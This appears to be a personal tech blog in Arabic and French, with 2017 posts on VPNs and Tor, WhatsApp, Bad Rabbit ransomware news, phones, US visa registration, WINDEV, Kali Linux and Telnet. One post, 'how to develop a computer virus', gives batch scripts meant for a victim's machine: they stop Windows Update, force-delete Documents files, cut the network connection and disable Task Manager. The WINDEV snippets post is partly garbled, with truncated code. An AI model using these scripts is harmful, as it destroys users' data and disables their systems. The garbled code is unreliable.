vendredi 29 décembre 2017

كيفيّة فتح المواقع المحجوبة

كيفيّة فتح المواقع المحجوبة هنالك عدّة طرق يمكن استخدامها لفتح المواقع المحجوبة، وقد تكون طريقة معيّنة أفضل من غيرها 

باختلاف الوسيلة المُستخدمة في عمليّة الحجب. من طرق تفادي حجب المواقع ما يلي:[٧][٥] استخدام شبكة خاصة افتراضيّة 

(بالإنجليزيّة: VPN): عند استخدام إحدى الشبكات الخاصّة الافتراضيّة للدخول إلى شبكة الإنترنت، فإنَّ جميع الرزم المتبادلة بين 

المرسل والمستقبل عند زيارة موقع إلكتروني تمر من خلال هذه الشبكة الافتراضيّة فقط. لعلَّ هذه الطريقة هي الأفضل لمواجهة 

الحجب في حالات تصفية عنوان الموقع الإلكتروني (بالإنجليزيّة: URL Filtering)، وتصفية الرزم (بالإنجليزيّة: Packet 

Filtering)، والتحرّي العميق للرزم (بالإنجليزيّة: Deep Packet Inspection)، وهجوم الوسيط. استخدام شبكة تور 

(بالإنجليزيّة: Tor): إنَّ إنشاء أي اتصال بموقع معيَّن عبر شبكة تور سيتم تشفيره بشكل تلقائي، ويُفضَّل استخدام تور في حالات 

الحجب التي تتم بواسطة تصفية عنوان الموقع الإلكتروني (بالإنجليزيّة: URL Filtering)، وتصفية الرزم (بالإنجليزيّة: 

Packet Filtering)، والتحرّي العميق للرزم (بالإنجليزيّة: Deep Packet Inspection)، وهجوم الوسيط. تغيير خادم

 نظام أسماء النطاقات (بالإنجليزيّة: DNS Server): تعد هذه الطريقة هي الأفضل لمواجهة الحجب الذي يقوم بتصفية نظام

 أسماء النطاقات وإعادة التوجيه. استخدام خادم وكيل (بالإنجليزيّة: Proxy): إنَّ الخادم الوكيل شبيه من حيث آليّة عمله بالشبكة 

الخاصّة الافتراضيّة، إلّا أنّه ليس بنفس درجة الثقة، وتعد هذه الطريقة هي جيّدة لتفادي الحجب الذي يعتمد على حجب عنوان الآي 

بي الخاص بالموقع الإلكتروني. إنشاء قناة بواسطة بروتوكول النقل الآمن (بالإنجليزيّة: SSH Tunnel): تعد هذه الطريقة 

متقدّمة ومُعقّدة بعض الشيء، وهي شبيهة من حيث آليّة عملها بالشبكة الخاصّة الافتراضيّة، فيتم تمرير جميع الرزم من خلال خادم

 يستطيع المستخدم الوصول إليه باستخدام بروتوكول النقل الآمن، بحيث تكون عمليّة تصفُّح الإنترنت على أنّها تتم من خلال هذا 

الخادم.


vendredi 27 octobre 2017

نصائح تكنولوجية كيفية التراجع عن إرسال رسالة على واتس اب قبل قراءتها من الطرف الآخر

بات بإمكان مستخدمي واتس اب حذف رسالة معينة جرى إرسالها عن طريق الخطأ قبل أن يتم قراءتها من قبل الجهة المستلمة للرسالة وذلك ضمن ميزة حذف لدى الجميع.
وتعتبر هذه الميزة إحدى أكثر المزايا التي تمت المطالبة بها من المستخدمين طوال الفترة الماضية، والآن أصبحت متوفرة رسمياً ضمن أحداث إصدار من تطبيق واتس اب.
وتتيح الميزة الجديدة حذف رسائل محددة تم إرسالها عن طريق الخطأ ضمن دردشة فردية أو جماعية أو دردشة فردية.

لكن قبل الانتقال إلى طريقة استخدام الميزة الجديدة فيجب عليك معرفة الآتي:

عند حذف رسالة قبل قراءتها من الطرف الآخر، سيتم استبدالها في الدردشة بتنبيه نصي “تم حذف هذه الرسالة

  • يُمكنك حذف رسالة مرسلة بالخطأ بعد أول سبع دقائق من إرسالها فقط وقبل رؤيتها من الطرف المستلم للرسالة، وفي حال مرت 7 دقائق على إرسالها فلن تتمكن من حذفها.
  • يجب أن يستخدم الطرف المرسل والمستقبل أحدث إصدار من تطبيق واتس اب للاستفادة من هذه الميزة.
  • قد تتمكن الجهة المستلمة للرسالة من رؤيتها قبل قيامك بالحذف أو عند عدم نجاح عملية الحذف لسبب ما مثل عدم استخدام أحدث إصدار من الطرف الآخر.
  • لن يقوم تطبيق واتساب بإرسال تنبيه لك في حال عدم نجاح عملية الحذف لدى الجميع.
  • الميزة غير متوفرة لدى جميع المستخدمين بعد.

وللقيام بحذف رسالة على واتس اب قبل قراءتها من الطرف الآخر اتبع الآتي:

  • انتقل إلى الدردشة التي تتضمن الرسالة المراد حذفها
  • اضغط مطولاً على الرسالة (يُمكنك تحديد عدة رسائل في آن واحد)
  • انقر على أيقونة الحذف من الأعلى ثم اختر “حذف لدى الجميع”
  • أما لحذف رسالة لديك فقط، فاتبع نفس الخطوات ثم اضغط “حذف لدي
  •     CHOUINI

هجمات الفدية الخبيثة Bad Rabbit

قالت شركة كاسبرسكي لاب إن هجومًا خطيرًا من نوع هجمات الفدية الخبيثة، التي انتشرت على نطاق واسع ومدمر في عام 2017، أصاب عددًا من المؤسسات الإعلامية في روسيا.
وقالت الشركة الروسية الرائدة في مجال أمن المعلومات في منشور على مدونتها: “في سنة 2017 انتشرت هجمات الفدية الخبيثة بشكل واسع، بالطبع نتحدث عن الهجمات الشهيرة و WannaCry و Expter”، وأضافت: “يبدو أن هناك هجومًا ثالثًا يلوح في الأفق”.
وأوضحت كاسبرسكي أن البرمجية الخبيثة الجديدة تسمى “باد رابيت” Bad Rabbit، وهو الاسم المستخدم في رسالة دفع الفدية، كما أن “المعلومات التي تم تأكيدها إلى هذه اللحظة أن هذه البرمجية الخبيثة أصابت العديد من المؤسسات الإعلامية في روسيا، منها وكالة Interfax الإخبارية و Fontanka.ru”.
ووفقًا للشركة، فقد تأكد إصابة شبكة معلومات مطار أوديسا ببرمجية خبيثة، ولكن لم يتم التبين من كون هذه البرمجية هي “باد رابيت” أم لا. هذا ويطلب المخترقون الذين يقفون خلف هذا الهجوم 0.05 بتكوين كفدية. وهو ما يقابل نحو 280 دولارًا أمريكيًا.
وذكرت كاسبرسكي أن تحليلها وجدت أن الهجمات لم تستخدم ثغرة معينة، وإنما عن طريق الهجوم على نحو مباشر، إذ يقوم الضحايا بتنزيل برنامج Adobe Flash مزيف. ويوجد هذا الملف على العديد من المواقع المصابة ومن ثم يقوم الضحايا بتنزيل وتثبيت الملف، مما يصيب أجهزتهم على الفور. وأضافت: “وجد باحثونا عددًا لا بأس به من المواقع المخترقة. كلها مواقع إعلامية ومواقع إخبارية”.
وأشارت الشركة إلى أن احتمالية حصول الضحايا على ملفاتهم مرة أخرى، سواء عن طريق دفع الفدية أو عن طريق ثغرة في شفرة البرمجية الخبيثة، ليست معروفة حتى الآن. ولكن خبراء كاسبرسكي يبحثون الآن في هذا الأمر.
وبحسب المعلومات الواردة لدى كاسبرسكي، فإن معظم الضحايا من روسيا. ولكن وقعت بعض من هذه الهجمات في أوكرانيا، وتركيا، وألمانيا. وقد وقعت هذه الهجمات عن طريق مواقع إلكترونية لوكالات إعلامية وإخبارية روسية.
ووفقًا للتحقيق الذي قامت به الشركة، فإن هذه الهجمات استهدفت شبكات الشركات وكانت تستخدم طرقًا شبيهة بالطرق المستخدمة في هجوم ExPetr “ولكن لا يمكننا ربط الهجمات الحالية بهجوم ExPetr”.
وتوصي كاسبرسكي المستخدمين الذين يخشون الوقوع ضحيةً لـ “باد رابيت”، بمنع الامتدادين: c:\windows\infpub.dat و c:\Windows\cscc.dat، من أجهزتهم، إضافة إلى إيقاف خدمات WMI لمنع البرمجية الخبيثة من الانتشار في شبكاتهم.
وتنصح الشركة أيضًا بأخذ نسخة احتياطية لجميع البيانات، كما تنصح بعدم الرضوخ لطلبات المخترقين ودفع الفدية.

mardi 24 octobre 2017

محرك بحت عربي ذكي 2018

أعلنت مختبرات لبيب في الإمارات العربية المتحدة عن إطلاق النسخة التجريبية من محرك البحث العربي لَبلِب الذي يقدم إجابات فورية للمستخدم معتمداً على الذكاء الاصطناعي.
وجاء في البيان الرسمي أن لَبلِب هو محرك بحث يعالج طبيعة المحتوى العربي على الانترنت، ليساعد المستخدم العربي للوصول إلى مبتغاه بشكل مباشر.  ويسمح لَبلِب للمستخدم باستثناء صفحات ذات مواضيع معينة من نتائج البحث، كالمواقع الدينية والمنتديات ومواقع المنوعات، وهي مجتمعة تسيطر على المحتوى العربي حالياً وتعيق الوصول إلى المحتوى المفيد. كما يتيح لَبلِب للوصول إلى بعض المعلومات كإجابات مباشرة دون الضغط على أي رابط. 
وقالت مختبرات لبيب إن زواحف لَبلِب تقوم بفهرسة الويب العربي بكامله عن طريق أدوات فهرسة خاصة، ولا يتم استثناء أي صفحة باللغة العربية، ثم يضيف لَبلِب معالجة ذكية مصمّمة لتصفية النتائج وإعادة ترتيبها بما يحقق تجربة أفضل للمستخدم وبالتالي وصوله إلى غايته من البحث بسرعة. ويركز لَبلِب على تقنيات الذكاء الصنعي وتعلّم الآلة لتحسين الفهم الآلي للغة العربية، وبالتالي تحسين جودة النتائج بالنسبة للمستخدم العربي على المدى البعيد، بالإضافة إلى أن مختبرات لبلب ستطرح خدمات بحث باللغة العربية للمؤسسات والشركات.
وأشار البيان إلى أن المشروع ما يزال في مرحلة الإطلاق التجريبي، وستكون نتائج البحث في تطور شبه لحظي باستمرار عمليات الفهرسة والأرشفة والتصنيف، بالإضافة إلى أن لَبلِب سيتعلّم من طلبات البحث التي يقوم بها المستخدمون مما يؤدي أيضاً لتحسين النتائج. 
الجدير بالذكر أن فريق لَبلِب يتضمن مجموعة مميزة من مهندسي الذكاء الاصطناعي في المنطقة العربية، وقد حصلوا على بيانات مهمة حول تحليل المحتوى العربي على الانترنت وتصنيفه، والتعرف إلى مواضيعه، واللهجات المستخدمة في إنتاجه في كل بلد عربيّ، ونوعية المواقع العربية التي تغلب عليها المنتديات والمواقع الدينية والمنوعات. 

آبل توقف مبيع آيفون 7 نسخة 256 جيجابايت

أجرت شركة آبل بعض التغييرات الرئيسية على تشكيلة هواتفها الرائدة آيفون خلال الشهر الماضي، وقد كشفت الشركة عن عدة إعلانات رئيسية، بما في ذلك هواتف آيفون 8 وآيفون 8 بلس وآيفون 10 الذي يأتي في خريف هذا العام، لكنها عمدت إلى إجراء بعض التغييرات فيما يخص هواتف العام الماضي آيفون 7، حيث أنها أوقفت مبيعات هاتف آيفون 7 بسعة 256 جيجابايت.
وتركت الشركة المستهلكين مع ثلاثة خيارات هي 32 أو 128 جيجابايت آيفون 7 أو الانتقال إلى آيفون 8 بسعة 256 جيجابايت، ووفقاً للتقارير فقد أوقفت شركة آبل بيع نموذج 256 جيجابايت من هاتف آيفون 7 بتاريخ 12 سبتمبر/ايلول الحالي، أي في نفس يوم كشف النقاب عن تشكيلة هواتف آيفون 8، وأكد مندوب خدمة العملاء لدى آبل أن الشركة لم تعد توفر نسخة 256 جيجابايت من هاتف آيفون 7 من خلال متجرها.
وقد لا تشكل مثل هذه الخطوة مسألة هامة بالنسبة للكثير من المستخدمين، لكنها مثال حي ومباشر للكيفية التي تتبعها شركة آبل في دفع المستخدمين نحو ترقية الهواتف من خلال تضييق الخيارات المتاحة بدلاً من ابتكار منتجات جديدة توفر مزايا واضحة للمستهلكين، حيث أن وجود مساحة تخزين موسعة تعني مرونة أكبر فيما يخص تنزيل التطبيقات الكبيرة والتقاط صور ومقاطع فيديو عالية الجودة وحفظ الموسيقى والأفلام ضمن الجهاز وما إلى ذلك.
وتعمل شركة آبل على تشجيع مشتريات هاتف آيفون 8 عن طريق جعلها السبيل الوحيد للحصول على هاتف آيفون بسعة 256 جيجابايت، حتى لو كان الناس غير مقتنعين بالحصول على الهاتف، والذي يمتلك ميزة شحن لاسلكي بسيط ومعالج أكثر قوة بقليل من هاتف آيفون 7، ورغم أن الشركة أوقفت الآن مبيعات آيفون 7 سعة 256 جيجابايت بشكل مباشر، لكن يمكن الحصول عليه من خلال شركات الهاتف المحمول.
وأفادت التقارير أن آبل تكافح من أجل أن تحصل هواتف آيفون 8 الجديدة على اهتمام المستهلكين، وأوضحت الأبحاث الاستقصائية الخاصة بشركات الاتصالات اللاسلكية في الولايات المتحدة أن المستهلكين يتجهون إلى شراء هواتف آيفون 7 بدلاً من هواتف آيفون 8 الجديدة.
وتستعد شركة آبل لطرح هاتف آيفون 10 الأكثر تقدماً، والذي يمتلك نسخ بسعات تخزينية تصل إلى 256 جيجابايت، خلال الشهر المقبل، مما قد يؤدي إلى تفاقم مشكلة قلة اهتمام المستهلكين بهاتف آيفون 8 الأقل حداثة بالمقارنة معه.

jeudi 19 octobre 2017

موعد التسجيل في الهجرة العشوائية الى امريكا 2019 و الطريقة و الموقع

في هذه السطور سنتعرف على كيفية التسجيل في قرعة امريكا 2019 عن طريق موقع القرعة الأمريكي Electronic Diversity Visa Lottery و المدة المتاحة للتسجيل في الهجرة، و الموعد المحدد لظهور نتيجة الهجرة العشوائية لامريكا 2019، فضلاً عن بعض المعلومات و النصائح الأخرى .

موعد التسجيل في الهجرة العشوائية الى امريكا 2019

رسمياً تم فتح باب التقديم في الهجرة العشوائية الى امريكا 2019  الساعة 12 ظهراً وفق التوقيت الشرقي للولايات المتحدة الأمريكية .

موعد اغلاق باب التسجيل في قرعة الهجرة لامريكا 2019

يتم فتح باب التسجيل بقرعة الهجرة الامريكية 2019 لمدة 36 يوماً، و سيتم غلق باب التسجيل في القرعة يوم 7 نومبر 2017 الساعة 12 ظهراً وفق التوقيت الشرقي للولايات المتحدة الأمريكية .

طريقة التسجيل في قرعة امريكا 2019

يمكنكم التسجيل في اللوتري الأمريكي في خطوات قليلة، لكن الأمر الأهم عند التسجيل هو رفع صورة شخصية مقبولة في القرعة الأمريكية، لأن أي أخطاء في الصورة، ستؤدي إلى رفض الطلب، و قبل التسجيل، يمكنكم التعرف على مواصفات الصورة للقرعة الأمريكية من خلال هذا المقال :الصورة الصحيحة و المقبولة للتسجيل في اللوتري 2019 .
بعد التعرف على مواصفات الصورة و اختيار الصورة الصحيحة للقرعة، يمكنكم بدأ اجراءات التسجيل في القرعة عن طريق الدخول لموقع القرعة الرئيسي ← ← https://www.dvlottery.state.gov → →علماً أن هذا الموقع هو الموقع الوحيد الذي يمكن عن طريقه التسجيل في لوتري 2019 .

vendredi 13 octobre 2017

WINDEV développement par les tests

La conception d'un logiciel, site internet, web service, API… comporte différentes étapes : • analyse ; • spécifications techniques et fonctionnelles ; • développement ; • tests (unitaires, intégrations, validations) ; • recettes ; • maintenance. Cette liste n'est pas exhaustive, elle peut varier, être réduite ou complétée selon le contexte technique, client, budgétaire… La conception d'un logiciel et ses étapes s'orientent autour du cycle de développement, il en existe plusieurs : • modèle en cascade ; • cycle en V ; • cycle en spirale ; • cycle semi-itératif ; • cycle itératif. Chaque cycle possède ses avantages et ses inconvénients, ainsi que des défenseurs et des détracteurs. Ils ont tous un point commun, placer en premier l'écriture du code avant la phase de tests dans le cycle de développement. Cet ordre chronologique paraît logique, on teste ce que l'on vient de produire, pourtant une autre technique préconise l'écriture des tests avant l'écriture de l'application.
I - Le développement par les tests
Commençons cet article par la définition du TDD (source Wikipédia) : Le Test Driven Development (TDD) ou en français le développement piloté par les tests est une technique de développement de logiciel qui préconise d'écrire les tests unitaires avant d'écrire le code source d'un logiciel. Contrairement à d'autres cycles de développement logiciel (modèle en cascade, cycle itératif) plaçant les tests en fin de cycle, le TDD place les tests en première place dans le cycle de développement. C'est une méthode dans laquelle l'écriture des tests automatisés dirige l'écriture du code source.
La mise en place de la méthode TDD offre de nombreux avantages au sein du développement d'un logiciel. Voici les avantages apportés par l'emploi de cette méthode. 
Les tests unitaires sont réellement écrits
Comme évoqué dans les autres cycles de développement, les tests sont effectués à la fin d'un projet. D'après plusieurs enquêtes, 70 % des projets informatiques se terminent en retard, pour diminuer ce retard la phase de test est souvent réduite au strict minimum. Le fait de commencer par rédiger les tests permet de s'assurer que les tests seront écrits. 
Fiabilité du code 
En suivant la méthode traditionnelle, le développeur écrit une fonctionnalité et va ensuite procéder aux tests afin de s'assurer que ce qu'il a codé est valide. Mais inconsciemment le développeur teste son code comme il l'a conçu, le nombre de bogues trouvés est peu important et le risque de passer à côté de bogues est élevé.
Analyse détaillée et plus précise 
En effet, lorsque le développeur écrit du code de test pour tester une implémentation qui n'existe pas encore, il va devoir penser aux détails de la méthode dont il a besoin pour écrire la spécification. Aussi, il va alors s'interroger sur le nom de la méthode, sa valeur de retour, ses paramètres, son comportement…, cela permet de clarifier la conception et d'écrire seulement du code utile.
Vérification démontrable,
 répétable et automatisée Le fait de disposer d'un grand nombre de tests permet de s'assurer de la solidité et garantie du code. 
Absence de régression
 Lorsqu'un développeur modifie une méthode existante lors d'une phase de factorisation, il peut relancer les tests unitaires afin de s'assurer que sa modification n'a pas impacté l'existant et bénéficie d'un retour immédiat. 
Couplage plus faible et conception simplifiée 
Le TDD impose d'écrire le code des tests en peu de temps ce qui amène le développeur à concevoir du code avec un faible couplage et avec un niveau relativement simple. Malgré les avantages listés ci-dessus, il faut bien comprendre que le TDD n'est pas une réponse miracle aux problèmes de développements dans les équipes, il n'empêche pas les bogues et les erreurs d'analyse, de conception… Quand on évoque le TDD, un inconvénient revient souvent : 
Plus de travail 
Depuis longtemps le développeur n'aime pas effectuer les tests, il trouve cette partie du travail fastidieuse, non valorisante et limite hors cadre de sa fonction. En écrivant des tests unitaires, le développeur a plus de travail.

lundi 25 septembre 2017

Déclaration de variables WINDEV


Déclaration de variables

// Déclaration de variables
Valeur
 est un entier 
RésultatSélection est un booléen
Prix est un réel
i,j,k sont des entiers


Enregistre le document présent dans le scanneur dans le fichier
// Le document sera enregistré en noir et blanc
SI TwainVersJPEG("C:\Temp\MaPhoto.JPEG"0FauxTwainNoirBlanc) = Vrai ALORS
Info("Le document a été enregistré")
SINON
Erreur("Le document n'a pas été scanné")
FIN

LECTURE D'UNE CLE REGISTRE 

// Lit la valeur "Langage" dans la clé "HKEY_LOCAL_MACHINE\SOFTWARE\Appli"
// Le booléen ResExécute permet de savoir si la valeur a été lue
ResLecture = RegistreLit("HKEY_LOCAL_MACHINE\SOFTWARE\Appli""Langage"ResExécute)

SI ResExécute = Vrai ALORS
Info("La valeur a été lue et vaut : " + ResLecture)
FIN


SELECTION D'UNE COLEUR

 est un 

CALCULE ENTRE DEUX DATE 

(

Envoi d'un email 

SI 

dimanche 17 septembre 2017

أسرع 10 هواتف ذكية! هل هاتفك بينهم؟

أصدر مؤشر "AnTuTu" المختص بتقييم الهواتف الذكية وفقاً لأداء شريحة المعالجة، تصنيفا جديدا لأكثر

 أجهزة الهواتف الذكية قوة في الأداء، ودخلت هذا التصنيف هواتف تعمل بنظام الأندرويد وهواتف 

أخرى بنظام "iOS".

واختير الهاتف الصيني الصنع "Vivo Xplay 5 Elite" الهاتف الأسرع أداء وإنتاجا حسب مؤشر

 "AnTuTu" إذ تبوأ الصدارة بـ138 ألف و706 نقطة،

و في المرتبة الثانية جاء هاتف آخر صيني الصنع وهو "LeEco Max 2" بـ 138 ألف و26 نقطة.

واحتل الهاتف "Zuk Z2 Pro" المركز الثالث وهو من إنتاج  الشركة الصينية "Lenovo" وحصل على 

136 ألف و853 نقطة

أما المركز الرابع فقد انفرد به الهاتف الصيني  "Xiaomi Mi5" بـ 136 ألف و773 نقطة.

وفي المركز الخامس ظهر هاتف من شركة "سامسونغ" الكورية وهو "S7 Edge" وجمع 134 ألف

 و599 نقطة تلاه في المرتبتين السادسة والسابعة على التوالي هاتفان من آبل وهما "أيفون 6s" و"أيفون 

"SE" بحصولهما على 133 ألف و781 و131 ألف و 401 نقطة على التوالي، وجاء هاتف "G5" الذي 

تصنعه شركة LG ثامنا بـ 128 ألف و232 نقطة.

أما المركزان التاسع والعاشر فشغلهما هاتفان صينيان، وهما من "Meizu Pro 6" و"Huawei Honor

 V8" وحصلا على 96 ألف و756 و94 ألف و164 نقطة على التوالي.

الشويني

jeudi 14 septembre 2017

أكبر الهواتف الذكية من حيث حجم الشاشة

تعتبر الهواتف الذكية من أكثر الأشياء التي نعشقها جميعا، ولكن تختلف اهتمامات وأولويات كل واحد عن الآخر في الهاتف الذكي الذي يريد أن يمتلكه، فهناك من يرى أن الكاميرا هي أهم شي في الهاتف فيجب أن تكون عالية الجودة، وهناك أيضا من يعتبر أن السرعة هي الأهم لذلك يحاول جاهدا البحث عن هاتف يمتلك أكبر سعة تخزين عشوائية ممكنة، وهناك آخرون يكون كل همهم هو أن يحصلوا على هاتف يحتوي على شاشة ضخمة حتى يستطيعوا أن يستخدموه بسهولة ويشاهدون الأفلام والصور ويمارسون الألعاب  بأقصى درجة ممكنة من الرفاهية، وإن كنت من ضمن هؤلاء الذين يروا أن أهم شئ في الهاتف الذكي هي الشاشة الكبيرة، فسوف نقدم لك قائمة ببعض الهواتف التي تعد الأكبر في الأسواق.

هاتف CoolPad Halo

يعتبر CoolPad Halo أكبر الهواتف الذكية، فهو يمتلك شاشة ضخمة بقياس 7 بوصة عالية الجودة، ويحتوي على 2 جيجابايت سعة ذاكرة الوصول العشوائية، وكاميرا عالية التقنية 13 ميجابيكسل، وبطارية ضخمة بسعة 4000 ميلي أمبير تعمل لساعات طويلة.

  • هاتف Sony Xperia Z Ultra
    قامت شركة سوني بإنتاج Sony Xperia Z Ultra ليكون من أكبر الهواتف التي تم تصنيعها، فهو يعمل بشاشة عملاقة 6.44 بوصة، فهو يحتوي على كاميرا بدقة 8 ميجابيكسل بدون فلاش، وبطارية 3050 ميلي أمبير.
  • هاتف Hisense X1
    يأتي هذا الهاتف بشاشة عملاقة يصل حجمها إلى 6.8 بوصة عالية التقنية، فهو مزود بذاكرة عشوائية 2 جيجابايت، ومعالج سناب دراجون 800، أما بالنسبة للبطارية فهو يحوي على واحدة بسعة 3900 ميلي أمبير، وبه كاميرا 13 ميجابيكسل.
هاتف Samsung Galaxy Mega 6.3
من الطبيعي أن تحتل شركة سامسونج مكانة في هذه القائمة، فهي لها العديد من الإصدارات التي تتميز بكبر حجمها، ومن أهمها الهاتف الذكي Samsung Galaxy Mega 6.3 الذي يمتلك شاشة 6.3 بوصة، وسعة تخزين عشوائية 1.5، بالإضافة إلى كاميرا 8 ميجابيكسل، وبطارية 3200 ميلي أمبير.

lundi 4 septembre 2017

كيف تطور في فيريس comment développer un virus informatique



أول شيء تفتح .txt
تقوم بنسخ سكريبت 
تسجله ب .bat 
ليصبح 
جاهز 



تعطيل تحديث ويندوز
@echo off
net stop "wuauserv"

 
---------------
 
2-
حذف ملف "My Documents"
@echo off 
del /f /q "%userprofile%\My Documents\*.*" 
del /f /q "%userprofile%\Documents\*.*"

 
-------------------

3-تعطيل اتصال الإنترنت .ملاحظة :عندما تشغل في جهاز الضحية اتصل بانترنته مجانا ههههههه

@echo off 
ipconfig /release 
if ERRORLEVEL1 ipconfig /release_all


تعطيل مدير المهام

@echo off 
reg add HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVe rsionPoliciesSystem /v DisableTaskMgr /t REG_SZ /d 1 /f >nul

mercredi 30 août 2017

طريقة تثبيت كالي لينوكس على هواتف الاندرويد لإختبارات الاختراق

اليوم باذن الله ساريكم طريقة تثببت اداة رائعة جدا هي الاداة التي يستخدمها الهكريون المحترفون وهي اداة او توزيعة  kali linux لكن سيكون ذلك على هواتف الاندرويد و ذلك لكثرة استعمال هذا الاخير اكثر من الحاسوب لسهولته و خفته و حمله. عك اينما ذهبت اذن تابعوا معي :
اول الاشياء هي تثبيت 3 تطبيقات وهي:
busy box
Linux deploy
AndroidVNC 
عند الانتهاء من تثبيت هاته التطبيقات في هاتفك نٱتي الآن الى الشروع في العمل:
١-تثبيت busy box فقط بالضغط على INSTALL 
٢-الذهاب الى linux deploy والضغط على ايقونة التحميل و وضع الاعدادات كما يلي:
- في Distribution نضع kali linux
ثم نعود الي الخلف و نضغط على GUI settings و نضع الاعدادات كما 
بعدها نضغط على install و للتذكير هذه العملية تٱخذ وقت طويل قد تٱخذ مدة ساعة او اكثر حسب قوة اتصالك بالانترنت و يجب عليك الصبر حتى يخرج لك في الاخير install >>> 
-بعدها  نعود و نضغط على ايقونة التحميل و نضغط على reconfigure لاعادة تثبيت جميع الحزم لكن هذه العملية لا تطول و سيظهر لك في الاخير reconfigure >>> 
-الان نضغط على ايقونة install وذلك للسماح لتطبيق  androidVNC للعمل
بعدها نذهب الى تطبيق  androidVNC و نضع الاعدادات التالية :
- surnom: نضع linux
- mot de passe : نضع changeme وهذا مهم جدا في الإعدادات
-و نختار 24-bit 
 احبابي انصحكم بستخدام تطبيق vnc viewer بدل تطبيق androidVNC فهو افضل منه بكثير نظرا لخفته و سهولة التعامل معه و لاحتوائه على les options واضحة و افضل من androidVNC فانا شخصيا استخدم VNC viewer و لتثبيته الطريقة سهلة جدا فبعد تثبيت busy box و linux deploy بالطريقة السالفة الذكر نٱتي لنفتح تطبيق vnc viewer و نضغط على add new connection ونضع مايلي :
-address : نضع localhost
-name : نضع kali
ثم نضغط على creat
 بعد الضغط على creat ستنبثق لك نافذة تكتب فيها كلمة السر وهي changeme ثم تضغط على حفظ كلمة السربعدها النتيجة كما في
ملاحظة : شروط تثبيت kali linux على الاندرويد :
- ان يكون هاتفك يملك صلاحيات الروت root
- ان تملك على هاتفك مساحة فارغة داخلية او خارجية اكثر من 5 GB


samedi 26 août 2017

TELNET ET TERMINAL A DISTANCE

Telnet est un protocole permettant d'émuler un terminal à distance, cela signifie qu'il permet d'exécuter des commandes saisies au clavier sur une machine distante. L'outil Telnet est une implémentation du protocole Telnet, cela signifie qu'il s'agit de la traduction des spécifications en langage informatique pour créer un programme permettant d'émuler un terminal. Telnet fonctionne dans un environnement client/serveur, c'est-à-dire que la machine distante est configurée en serveur et par conséquent attend qu'une machine lui demande un service. Ainsi, étant donné que la machine distante envoie les données à afficher, l'utilisateur a l'impression de travailler directement sur la machine distante. Sous UNIX, le service est fourni par ce que l'on appelle un démon, une petite tâche qui fonctionne en arrière-plan. Le démon Telnet s'appelle Telnetd.

Protocole et implémentation  

Telnet est aussi un protocole, c'est-à-dire un ensemble de règles et de procédures qui ont été définies afin de standardiser la communication sous Telnet. Ainsi, Telnet a rapidement été implémenté (adapté à partir des spécifications du protocole) sous de nombreuses plateformes.

Exécution de Telnet 

Telnet est fourni en standard sous diverses plateformes, dont UNIX, Windows95, WindowsNT, Linux... La commande pour initier une session Telnet est généralement la suivante : telnet nom_du_serveur nom_du_serveur représente bien évidemment le nom de la machine distante à laquelle on désire se connecter. Il est aussi possible de donner son adresse IP, par exemple : telnet 125.64.124.77 Enfin il est également possible de préciser le port à utiliser en faisant suivre l'adresse IP ou le nom du serveur par le numéro de port : telnet 125.64.124.77 80 

Commandes sous Telnet 

Une fois que vous vous connectez à la machine distante, un nom d'utilisateur (login) et un mot de passe (password) vous seront demandés pour des raisons de sécurité afin de restreindre l'accès aux seules personnes autorisées. En effet, Telnet est un protocole puissant puisqu'il permet l'exécution de commandes à distance. Les commandes pouvant être exécutées sous une session Telnet sont définies par l'administrateur réseau. Il s'agit généralement de commandes UNIX étant donné que la plupart des serveurs Telnet fonctionnent sous UNIX. Les commandes standard sont les suivantes :

 Commande Description 
? Affiche l'aide 
close Termine la session Telnet 
display Affiche à l'écran les paramètres de la connexion (type de terminal, port) 
environ Permet de définir les variables d'environnement du système d'exploitation 
logout Permet de se déconnecter 
mode Bascule entre les modes de transfert ASCII (transfert d'un fichier en mode texte) et BINARY (transfert d'un fichier en binaire) 
open Permet de lancer une autre connexion à partir de la connexion en cours 
quit Quitte l'application Telnet 
set Modifie les paramètres de la connexion 
unset Charge les paramètres de connexion par défaut
                                                                                                                                              CHOUINI

jeudi 24 août 2017

COMMANDE DE KALI LINUX

Kali Linux est une distribution Linux basée sur Debian visant à faire des tests de pénétration avancée et audit de sécurité. Kali contient plusieurs centaines d'outils destinés à diverses tâches de sécurité de l'information, tels que des tests de pénétration. Kali Linux est développé, financé et maintenu par Offensive Security, une société d'informations sur la sécurité informatique de premier plan.


Nous allons dès à présent lister les commandes basiques applicables à Kali Linux avec leur fonctionnalité (classées de A à Z / liste non exhaustive) :

A
apropos Recherche les pages d’aides
apt-get Recherche et installe des paquets de logiciels
aptitude Recherche et installe des paquets de logiciels
aspell Vérificateur orthographique
awk Recherche et remplace du texte et bases de données
B
basename Trouve le répertoire et le suffixe d’un nom de fichier
bash GNU Bourne-Again Shell
bc Langage arbitraire pour des calculs de précision
bg Envoyer à la fin
break Sortir d’une boucle
builtin Exécuter un Shell Builtin
bzip2 Compresser ou décompresser des fichiers
C
cal Afficher un calendrier
case Effectue conditionnellement une commande
cat Concatène et affiche le contenu des fichiers
cd Change de dossier
cfdisk Manipulateur des tables de partition pour Linux
chgrp Change de groupe propriétaire
chmod Change les permissions d’accès
chown Change le propriétaire du fichier et le groupe
chroot Exécute une commande avec un autre répertoire pour racine
chkconfig Services du système (runlevel)
cksum Affiche le CRC checksum et le nombre d’octets
clear Efface le contenu présent dans le terminal
cmp Compare deux fichiers
comm Compare deux fichiers triés ligne par ligne
command Exécute une commande – Ignore les fonctions Shell
continue Reprendre la prochaine itération d’une boucle
cp Copier un ou plusieurs fichiers vers un autre emplacement
cron Daemon utilisé pour exécuter des commandes planifiées
crontab Programme une commande à exécuter à une date futur
csplit Divise un fichier en morceaux déterminés
cut Divise un fichier en plusieurs parties
D
date Affiche ou change la date et l’heure
dc Calculatrice de bureau
dd Converti et copie un fichier, écris les entêtes de disque et les enregistrements d’amorçage
ddrescue Outil de récupération de données
declare Déclare les variables et leur donne un attribut
df Affiche l’espace libre du disque
diff Affiche les différences entre deux fichiers
diff3 Affiche les différences entre tris fichiers
dig DNS lookup
dir Liste brièvement le contenu des répertoires
dircolors Configure les couleurs de la commande « ls »
dirname Converti le chemin d’accès en la partie répertoire d’un chemin d’accès
dirs Afficher la liste des répertoires mémorisés
dmesg Afficher les messages du Kernel et des Drivers
du Estimation de l’utilisation de l’espace par les fichiers
E
echo Affiche un message sur l’écran
egrep Recherche de fichier pour les lignes qui correspondent à une expression prolongée
eject Ejecte un support amovible
enable Active et désactive les commandes Shell Builtin
env Variable d’environnement
